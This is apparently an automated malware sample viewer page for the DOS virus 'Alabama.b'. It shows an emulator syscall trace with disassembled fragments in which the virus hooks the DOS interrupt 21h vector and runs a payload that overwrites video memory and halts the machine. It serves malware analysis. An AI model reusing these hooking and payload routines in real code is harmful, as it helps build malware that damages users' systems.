Sample viewer

vx.netlux.org/Virus.DOS.Alabama.b

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:43:00.838184501Z 74 PC: 12dfa | Reallocate memory
2018-12-17T22:43:00.840279768Z 44 PC: 12e26 | Get time 0x12e26: mov byte ptr es:[5], ch
0x12e2b: pop word ptr es:[0x518]
0x12e30: pop word ptr es:[0x51a]
0x12e35: xor bx, bx
0x12e37: mov ds, bx
0x12e39: mov word ptr [bx + 0x84], 0x51c
0x12e3f: mov word ptr [bx + 0x86], es
0x12e43: call 0x12ed4
0x12e46: pop bp
0x12e47: pop si
0x12e48: pop di
0x12e49: pop es
0x12e4a: pop ds
0x12e4b: pop dx
0x12e4c: pop cx
0x12e4d: pop bx
0x12e4e: pop ax
0x12e4f: push cs
0x12e50: pop ax
0x12e51: sub ax, 0x28
2018-12-17T22:43:00.843922166Z 44 PC: 98884 | Get time 0x98884: cmp ch, byte ptr cs:[5]
0x98889: je 0x98902
0x9888b: cmp word ptr cs:[3], 0x2a3
0x98892: jbe 0x98902
0x98894: mov ax, 3
0x98897: int 0x10
0x98899: call 0x98907
0x9889c: mov ax, 0xb800
0x9889f: call 0x988aa
0x988a2: mov ax, 0xb000
0x988a5: call 0x988aa
0x988a8: cli
0x988a9: hlt
0x988aa: mov es, ax
0x988ac: xor di, di
0x988ae: mov ax, 0x8cc9
0x988b1: stosw word ptr es:[di], ax
0x988b2: mov al, 0xcd
0x988b4: mov cx, 0x4e
0x988b7: rep stosd dword ptr es:[di], eax